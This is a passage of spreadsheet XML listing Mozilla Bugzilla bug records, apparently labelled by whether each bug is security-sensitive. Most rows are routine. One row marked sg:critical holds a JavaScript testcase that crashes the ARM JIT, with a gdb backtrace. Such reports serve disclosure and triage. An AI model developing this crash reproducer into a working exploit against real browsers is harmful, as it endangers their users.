        </is>
      </c>
      <c r="M3800" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3800" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3800" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3800" t="inlineStr"/>
      <c r="Q3800" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3800" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3800" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3800" t="n">
        <v>1</v>
      </c>
      <c r="U3800" t="n">
        <v>0</v>
      </c>
      <c r="V3800" t="n">
        <v>10</v>
      </c>
      <c r="W3800" t="inlineStr">
        <is>
          <t>As of https://bugzilla.mozilla.org/show_bug.cgi?id=1100354 we drive the SuperSearch fields from a static file instead [0]. 
Partial motivation for this was to "invite" more people than the Admin superusers to maintain what fields can be queried and how. Like we do with the siglist txt files we want to welcome people to add/edit/remove from this by making pull requests against the repo. 
There needs to be some hand-holding documentation about how it works and what the various things mean. 
See https://github.com/mozilla-services/socorro/blob/master/socorro/siglists/README.md and https://github.com/mozilla-services/socorro/blob/master/socorro/schemas/README.md 
Also, there should probably be some sort of automation that checks this file. I.e. if you make a PR edit on that file and accidentally make a formatting error so it's not valid JSON, then test automation should immediately notice. 
Also we probably want to do some other business logic rules validation on the keys within. I.e. that each section has 'name', etc. 
[0] https://github.com/mozilla-services/socorro/blob/master/socorro/external/es/data/super_search_fields.json</t>
        </is>
      </c>
      <c r="X3800" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3801">
      <c r="A3801" t="n">
        <v>994907</v>
      </c>
      <c r="B3801" t="inlineStr">
        <is>
          <t>2014-04-10 12:53:49 -0700</t>
        </is>
      </c>
      <c r="C3801" t="inlineStr">
        <is>
          <t>imgDecoderObserver is refcounted on multiple threads</t>
        </is>
      </c>
      <c r="D3801" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:07 -0700</t>
        </is>
      </c>
      <c r="E3801" t="n">
        <v>1</v>
      </c>
      <c r="F3801" t="n">
        <v>1</v>
      </c>
      <c r="G3801" t="n">
        <v>3</v>
      </c>
      <c r="H3801" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3801" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3801" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3801" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3801" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3801" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3801" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3801" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3801" t="inlineStr">
        <is>
          <t>[qa-][adv-main30+][adv-esr24.6+]</t>
        </is>
      </c>
      <c r="Q3801" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3801" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3801" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T3801" t="n">
        <v>1</v>
      </c>
      <c r="U3801" t="n">
        <v>0</v>
      </c>
      <c r="V3801" t="n">
        <v>30</v>
      </c>
      <c r="W3801" t="inlineStr">
        <is>
          <t>Created attachment 8404929
Stack
But it does not have threadsafe refcounting.</t>
        </is>
      </c>
      <c r="X3801" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3802">
      <c r="A3802" t="n">
        <v>888107</v>
      </c>
      <c r="B3802" t="inlineStr">
        <is>
          <t>2013-06-27 17:43:04 -0700</t>
        </is>
      </c>
      <c r="C3802" t="inlineStr">
        <is>
          <t>We don't clear newly allocated WebGL array buffers if their contents are not initially specified</t>
        </is>
      </c>
      <c r="D3802" t="inlineStr">
        <is>
          <t>2014-11-19 20:03:20 -0800</t>
        </is>
      </c>
      <c r="E3802" t="n">
        <v>1</v>
      </c>
      <c r="F3802" t="n">
        <v>1</v>
      </c>
      <c r="G3802" t="n">
        <v>3</v>
      </c>
      <c r="H3802" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3802" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3802" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3802" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3802" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3802" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3802" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3802" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3802" t="inlineStr">
        <is>
          <t>[adv-main23+][adv-esr1708+][qa-]</t>
        </is>
      </c>
      <c r="Q3802" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3802" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3802" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T3802" t="n">
        <v>1</v>
      </c>
      <c r="U3802" t="n">
        <v>0</v>
      </c>
      <c r="V3802" t="n">
        <v>17</v>
      </c>
      <c r="W3802" t="inlineStr">
        <is>
          <t>Created attachment 768675
patch: calloc data for pure-alloc BufferData calls
I'm not sure if this is actually a sec issue. bjacob might have a better idea.
Do we do this for a reason? Does the spec specify that they're cleared to zero?
I ran into this while updating ANGLE. ANGLE currently has a nice bug where it tries to copy the `data` during BufferData, even if `data` is null. While this should work anyways, I was surprised that we do this at all, since it's possible to read data back out of array buffers obliquely.</t>
        </is>
      </c>
      <c r="X3802" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3803">
      <c r="A3803" t="n">
        <v>540642</v>
      </c>
      <c r="B3803" t="inlineStr">
        <is>
          <t>2010-01-19 10:01:53 -0800</t>
        </is>
      </c>
      <c r="C3803" t="inlineStr">
        <is>
          <t>nsDocument::MaybePreLoadImage doesn't play nicely with nsIContentPolicy</t>
        </is>
      </c>
      <c r="D3803" t="inlineStr">
        <is>
          <t>2010-03-24 00:28:18 -0700</t>
        </is>
      </c>
      <c r="E3803" t="n">
        <v>1</v>
      </c>
      <c r="F3803" t="n">
        <v>1</v>
      </c>
      <c r="G3803" t="n">
        <v>3</v>
      </c>
      <c r="H3803" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3803" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3803" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K3803" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3803" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3803" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3803" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3803" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3803" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q3803" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3803" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3803" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3803" t="n">
        <v>1</v>
      </c>
      <c r="U3803" t="n">
        <v>0</v>
      </c>
      <c r="V3803" t="n">
        <v>28</v>
      </c>
      <c r="W3803" t="inlineStr">
        <is>
          <t>We have a content policy, but this function is bypassing it.
As a result I was asked to review a hack to gecko.
Essentially this broke the API for nsIContentPolicy</t>
        </is>
      </c>
      <c r="X3803" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3804">
      <c r="A3804" t="n">
        <v>1434005</v>
      </c>
      <c r="B3804" t="inlineStr">
        <is>
          <t>2018-01-29 11:04:31 -0800</t>
        </is>
      </c>
      <c r="C3804" t="inlineStr">
        <is>
          <t>[tracking protection 2.0]  App hamburger menu: tracking protection radio button (and change other on/offs to radios)</t>
        </is>
      </c>
      <c r="D3804" t="inlineStr">
        <is>
          <t>2018-03-05 06:22:20 -0800</t>
        </is>
      </c>
      <c r="E3804" t="n">
        <v>1</v>
      </c>
      <c r="F3804" t="n">
        <v>1</v>
      </c>
      <c r="G3804" t="n">
        <v>2</v>
      </c>
      <c r="H3804" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3804" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J3804" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3804" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3804" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3804" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N3804" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3804" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3804" t="inlineStr"/>
      <c r="Q3804" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3804" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3804" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3804" t="n">
        <v>1</v>
      </c>
      <c r="U3804" t="n">
        <v>0</v>
      </c>
      <c r="V3804" t="n">
        <v>6</v>
      </c>
      <c r="W3804" t="inlineStr">
        <is>
          <t>Created attachment 8946332
Screenshot-2018-1-29 Application Menu - TP Off.png
from bbell's UI spec doc</t>
        </is>
      </c>
      <c r="X3804" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3805">
      <c r="A3805" t="n">
        <v>134571</v>
      </c>
      <c r="B3805" t="inlineStr">
        <is>
          <t>2002-03-31 18:13:43 -0800</t>
        </is>
      </c>
      <c r="C3805" t="inlineStr">
        <is>
          <t>client-side image maps in showdependencygraph.cgi</t>
        </is>
      </c>
      <c r="D3805" t="inlineStr">
        <is>
          <t>2016-03-03 11:45:15 -0800</t>
        </is>
      </c>
      <c r="E3805" t="n">
        <v>1</v>
      </c>
      <c r="F3805" t="n">
        <v>1</v>
      </c>
      <c r="G3805" t="n">
        <v>4</v>
      </c>
      <c r="H3805" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3805" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3805" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K3805" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L3805" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3805" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3805" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3805" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3805" t="inlineStr"/>
      <c r="Q3805" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R3805" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3805" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T3805" t="n">
        <v>1</v>
      </c>
      <c r="U3805" t="n">
        <v>0</v>
      </c>
      <c r="V3805" t="n">
        <v>25</v>
      </c>
      <c r="W3805" t="inlineStr">
        <is>
          <t>Dependency graphs use server-side image maps in order that a user can click on a
bug's node to bring up the bug's details.  When using 'dot' (bug 120537) or the
GraphViz module (bug 134565), the image map data is able to be generated in time
to be included as a client-side image maps.</t>
        </is>
      </c>
      <c r="X3805" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3806">
      <c r="A3806" t="n">
        <v>830595</v>
      </c>
      <c r="B3806" t="inlineStr">
        <is>
          <t>2013-01-14 17:36:26 -0800</t>
        </is>
      </c>
      <c r="C3806" t="inlineStr">
        <is>
          <t>compartment mismatch in nsJSContext::ExecuteScript (with Babylon toolbar and Free Download Manager?)</t>
        </is>
      </c>
      <c r="D3806" t="inlineStr">
        <is>
          <t>2019-09-06 13:22:43 -0700</t>
        </is>
      </c>
      <c r="E3806" t="n">
        <v>1</v>
      </c>
      <c r="F3806" t="n">
        <v>1</v>
      </c>
      <c r="G3806" t="n">
        <v>3</v>
      </c>
      <c r="H3806" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3806" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3806" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3806" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3806" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3806" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3806" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3806" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3806" t="inlineStr">
        <is>
          <t>[adv-main20+]</t>
        </is>
      </c>
      <c r="Q3806" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3806" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3806" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T3806" t="n">
        <v>1</v>
      </c>
      <c r="U3806" t="n">
        <v>0</v>
      </c>
      <c r="V3806" t="n">
        <v>24</v>
      </c>
      <c r="W3806" t="inlineStr">
        <is>
          <t>This function does an autorequest, but does not enter the compartment it is about to start executing in. bholley suggested the fix is to just enter the compartment there.
This seems to cause badness when nsXULDocument::OnStreamComplete calls into nsXULDocument::ExecuteScript:
https://crash-stats.mozilla.com/report/index/54ae0c21-948c-4cb9-8e9b-b1b692130106
https://crash-stats.mozilla.com/report/index/88677c28-4597-4d7d-9b16-50b502130112
This is similar, though the stack looks junky:
https://crash-stats.mozilla.com/report/index/34337f2a-e82d-4c86-8a40-61ea72130113</t>
        </is>
      </c>
      <c r="X3806" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3807">
      <c r="A3807" t="n">
        <v>397093</v>
      </c>
      <c r="B3807" t="inlineStr">
        <is>
          <t>2007-09-21 12:34:56 -0700</t>
        </is>
      </c>
      <c r="C3807" t="inlineStr">
        <is>
          <t>Faulty .properties file results in uninitialized memory being used</t>
        </is>
      </c>
      <c r="D3807" t="inlineStr">
        <is>
          <t>2009-01-05 11:57:28 -0800</t>
        </is>
      </c>
      <c r="E3807" t="n">
        <v>1</v>
      </c>
      <c r="F3807" t="n">
        <v>1</v>
      </c>
      <c r="G3807" t="n">
        <v>3</v>
      </c>
      <c r="H3807" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3807" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3807" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K3807" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3807" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3807" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3807" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3807" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3807" t="inlineStr">
        <is>
          <t>[sg:low] 1.8 branch, requires faulty localization/addon</t>
        </is>
      </c>
      <c r="Q3807" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3807" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3807" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3807" t="n">
        <v>1</v>
      </c>
      <c r="U3807" t="n">
        <v>0</v>
      </c>
      <c r="V3807" t="n">
        <v>27</v>
      </c>
      <c r="W3807" t="inlineStr">
        <is>
          <t>Created attachment 281857
faulty properties file, bad encoding
I have hit a weird bug writing an extension for Firefox. The extension is localized in both french and english.
One of the french *.properties file was not UTF-8 but ISO8859-encoded.
The window opened by my extension retrieves 3 strings from that properties file.
Surprisingly, the first retrieval (string 'textLayouts' in the attached file)
did not fail, while the two others did fail.
BUT what I got back from that first |GetStringFromName()| call was absolutely not
what's in the properties file but some text coming from a MS Word process also
running on my machine !!! My XUL window was showing me a bit of the text I was
editing in Word...
Fixing the encoding of the file of course resolved the issue.</t>
        </is>
      </c>
      <c r="X3807" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3808">
      <c r="A3808" t="n">
        <v>718852</v>
      </c>
      <c r="B3808" t="inlineStr">
        <is>
          <t>2012-01-17 15:16:39 -0800</t>
        </is>
      </c>
      <c r="C3808" t="inlineStr">
        <is>
          <t>[ARM] Assertion failure: lastResort != FrameState::InvalidIndex, at methodjit/ImmutableSync.cpp:133 or crash [@ JSC::ARMAssembler::nameGpReg]</t>
        </is>
      </c>
      <c r="D3808" t="inlineStr">
        <is>
          <t>2013-03-20 04:50:55 -0700</t>
        </is>
      </c>
      <c r="E3808" t="n">
        <v>1</v>
      </c>
      <c r="F3808" t="n">
        <v>1</v>
      </c>
      <c r="G3808" t="n">
        <v>3</v>
      </c>
      <c r="H3808" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3808" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3808" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3808" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3808" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3808" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3808" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3808" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3808" t="inlineStr">
        <is>
          <t>[sg:critical] js-triage-done [advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3808" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3808" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3808" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3808" t="n">
        <v>1</v>
      </c>
      <c r="U3808" t="n">
        <v>0</v>
      </c>
      <c r="V3808" t="n">
        <v>6</v>
      </c>
      <c r="W3808" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision 0b4c58200e3a (options -m -n -a):
function fannkuch(n) {
   var perm1 = Array(n);
   while (true) {
      if (check &lt; 30){
         for(var i=0; i&lt;n; i++) s += (perm1[i]+1).toString();
         while (i &lt; r) {
            var j = this.abstract + 1;
            perm1[i] = perm1[j];
         }
      }
   }
}
fannkuch(8);
S-s because this triggers quite a few additional assertions when continuing, and then crashes:
Program received signal SIGSEGV, Segmentation fault.
0x0023b8fc in JSC::ARMAssembler::nameGpReg (reg=-1) at ../assembler/assembler/ARMAssembler.h:1233
1233                ASSERT(reg &gt;= 0);
(gdb) bt
#0  0x0023b8fc in JSC::ARMAssembler::nameGpReg (reg=-1) at ../assembler/assembler/ARMAssembler.h:1233
#1  0x0023ae36 in JSC::ARMAssembler::dtr_u (this=0x64fbf0, isLoad=true, rd=-1, rb=10, offset=64, cc=JSC::ARMAssembler::AL) at ../assembler/assembler/ARMAssembler.h:651
#2  0x002ac5c2 in JSC::ARMAssembler::dataTransfer32 (this=0x64fbf0, isLoad=true, srcDst=4294967295, base=JSC::ARMRegisters::r10, offset=64)
    at /home/decoder/mozilla-central/js/src/assembler/assembler/ARMAssembler.cpp:356
#3  0x0023c43a in JSC::MacroAssemblerARM::load32 (this=0x64fbf0, address=..., dest=4294967295) at ../assembler/assembler/MacroAssemblerARM.h:303
#4  0x00247838 in js::mjit::NunboxAssembler::loadPayload&lt;JSC::AbstractMacroAssembler&lt;JSC::ARMAssembler&gt;::Address&gt; (this=0x64fbf0, address=..., reg=4294967295)
    at /home/decoder/mozilla-central/js/src/methodjit/NunboxAssembler.h:134
#5  0x002a1094 in js::mjit::ImmutableSync::ensureDataReg (this=0xbee3ea20, fe=0x64a540, e=...) at /home/decoder/mozilla-central/js/src/methodjit/ImmutableSync.cpp:222
#6  0x002a1190 in js::mjit::ImmutableSync::syncCopy (this=0xbee3ea20, fe=0x64a600) at /home/decoder/mozilla-central/js/src/methodjit/ImmutableSync.cpp:244
#7  0x002a0e82 in js::mjit::ImmutableSync::sync (this=0xbee3ea20, fe=0x64a600) at /home/decoder/mozilla-central/js/src/methodjit/ImmutableSync.cpp:179
#8  0x0025c744 in js::mjit::FrameState::syncFancy (this=0xbee3e9f8, masm=..., avail=..., trackerIndex=5) at /home/decoder/mozilla-central/js/src/methodjit/FrameState.cpp:1280
#9  0x0025cb78 in js::mjit::FrameState::sync (this=0xbee3e9f8, masm=..., uses=...) at /home/decoder/mozilla-central/js/src/methodjit/FrameState.cpp:1382
#10 0x00288caa in js::mjit::StubCompiler::syncExit (this=0xbee413a8, uses=...) at /home/decoder/mozilla-central/js/src/methodjit/StubCompiler.cpp:83
#11 0x00288d40 in js::mjit::StubCompiler::linkExit (this=0xbee413a8, j=..., uses=...) at /home/decoder/mozilla-central/js/src/methodjit/StubCompiler.cpp:120
#12 0x00277976 in js::mjit::Compiler::jsop_setelem (this=0xbee3ddb0, popGuaranteed=true) at /home/decoder/mozilla-central/js/src/methodjit/FastOps.cpp:1592
#13 0x0022568a in js::mjit::Compiler::generateMethod (this=0xbee3ddb0) at /home/decoder/mozilla-central/js/src/methodjit/Compiler.cpp:2046
#14 0x0021e3b6 in js::mjit::Compiler::performCompilation (this=0xbee3ddb0, jitp=0x40a061b8) at /home/decoder/mozilla-central/js/src/methodjit/Compiler.cpp:539
#15 0x0021d562 in js::mjit::Compiler::compile (this=0xbee3ddb0) at /home/decoder/mozilla-central/js/src/methodjit/Compiler.cpp:157
#16 0x0021eb90 in js::mjit::TryCompile (cx=0x640fb0, script=0x40a06128, construct=false) at /home/decoder/mozilla-central/js/src/methodjit/Compiler.cpp:647
#17 0x000d2ea4 in js::mjit::CanMethodJIT (cx=0x640fb0, script=0x40a06128, construct=false, request=js::mjit::CompileRequest_Interpreter)
    at /home/decoder/mozilla-central/js/src/methodjit/MethodJIT-inl.h:77
#18 0x000e0b88 in js::Interpret (cx=0x640fb0, entryFrame=0x40422020, interpMode=js::JSINTERP_NORMAL) at /home/decoder/mozilla-central/js/src/jsinterp.cpp:3046
#19 0x002197c6 in js::mjit::EnterMethodJIT (cx=0x640fb0, fp=0x40422020, code=0x40216070, stackLimit=0x40802000, partial=false)
    at /home/decoder/mozilla-central/js/src/methodjit/MethodJIT.cpp:1079
(gdb) x /2i $pc
=&gt; 0x23b8fc &lt;JSC::ARMAssembler::nameGpReg(int)+100&gt;:    str     r2, [r3, #0]
   0x23b8fe &lt;JSC::ARMAssembler::nameGpReg(int)+102&gt;:    mov.w   r3, #0
(gdb) info register r2 r3
r2             0x0      0
r3             0xbbadbeef       3148725999
Judging the assert/crash with my professional JS developer skills (! ;D) this could be a register allocation problem during compilation.</t>
        </is>
      </c>
      <c r="X3808" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3809">
      <c r="A3809" t="n">
        <v>1248530</v>
      </c>
      <c r="B3809" t="inlineStr">
        <is>
          <t>2016-02-15 21:48:36 -0800</t>
        </is>
      </c>
      <c r="C3809" t="inlineStr">
        <is>
          <t>Link clicker pointer offset down when seen on the desktop client side</t>
        </is>
      </c>
      <c r="D3809" t="inlineStr">
        <is>
          <t>2016-02-17 07:51:23 -0800</t>
        </is>
      </c>
      <c r="E3809" t="n">
        <v>1</v>
      </c>
      <c r="F3809" t="n">
        <v>1</v>
      </c>
      <c r="G3809" t="n">
        <v>6</v>
      </c>
      <c r="H3809" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3809" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J3809" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K3809" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3809" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3809" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3809" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3809" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3809" t="inlineStr"/>
      <c r="Q3809" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3809" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3809" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3809" t="n">
        <v>1</v>
      </c>
      <c r="U3809" t="n">
        <v>0</v>
      </c>
      <c r="V3809" t="n">
        <v>13</v>
      </c>
      <c r="W3809" t="inlineStr">
        <is>
          <t>STR:
1 Generator creates and shares room
2 Clicker joins
3 Generator can see clicker pointer but it is represented lower than what is the true position on the clicker side</t>
        </is>
      </c>
      <c r="X3809" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3810">
      <c r="A3810" t="n">
        <v>1477721</v>
      </c>
      <c r="B3810" t="inlineStr">
        <is>
          <t>2018-07-23 07:07:03 -0700</t>
        </is>
      </c>
      <c r="C3810" t="inlineStr">
        <is>
          <t>socorro deploy: 324</t>
        </is>
      </c>
      <c r="D3810" t="inlineStr">
        <is>
          <t>2018-07-23 08:14:58 -0700</t>
        </is>
      </c>
      <c r="E3810" t="n">
        <v>1</v>
      </c>
      <c r="F3810" t="n">
        <v>1</v>
      </c>
      <c r="G3810" t="n">
        <v>4</v>
      </c>
      <c r="H3810" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3810" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3810" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K3810" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3810" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3810" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3810" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3810" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3810" t="inlineStr"/>
      <c r="Q3810" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3810" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3810" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3810" t="n">
        <v>1</v>
      </c>
      <c r="U3810" t="n">
        <v>0</v>
      </c>
      <c r="V3810" t="n">
        <v>5</v>
      </c>
      <c r="W3810" t="inlineStr">
        <is>
          <t>We want to do a Socorro -prod deploy today tagged 324.
It consists of the following:
(current tag: 323 - 6c6523e)
267cfa7: fix bug 1474441: added Jest and Enzyme (AlexisDeschamps)
26bd3cc: fix bug 1474441: added review updates (AlexisDeschamps)
e03d992: fix bug 1475482 - Skip "__fixunsdfsi" (cpeterso)
f691932: Update bug component for signature generation changes (willkg)
5615db0: Fix conjugation (willkg)
aa5da91: fix bug 1475993: add debug view with ip info (willkg)
c0b03cb: Add HTTP_X_REAL_IP per Brian's wishes (willkg)
d84709b: bug 1344864: refactored topcrashers (AlexisDeschamps)
4c92cec: fix bug 1344864: added startup stats sig summary (AlexisDeschamps)
9d6160b: fix bug 1344864: added review updates (AlexisDeschamps)
c2bb2be: fix bug 1344864: added review updates (AlexisDeschamps)
cf255ab: Documented migrations, updated docs, fixed github url (willkg)
6fd87cb: Add note to socorro_app.rst about it being outdated (willkg)
b57e231: fix bug 1476697: switch from X_FORWARDED_FOR to X_REAL_IP (willkg)
5b8d755: Rename middleware to match its new behavior (willkg)
133d4ab: bug 1475820: tweak rust panic symbols in siglists (willkg)
260734b: fix bug 1475820: make begin_panic and begin_panic_fmt sentinels (willkg)
ad8c3a7: Sort API_WHITELIST (willkg)
0e89fb4: fix bug 1477344: add MinidumpSha256Hash to RawCrash allow list (willkg)
(next tag: 324 - 1f2db9f)</t>
        </is>
      </c>
      <c r="X3810" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3811">
      <c r="A3811" t="n">
        <v>1542581</v>
      </c>
      <c r="B3811" t="inlineStr">
        <is>
          <t>2019-04-06 23:16:21 -0700</t>
        </is>
      </c>
      <c r="C3811" t="inlineStr">
        <is>
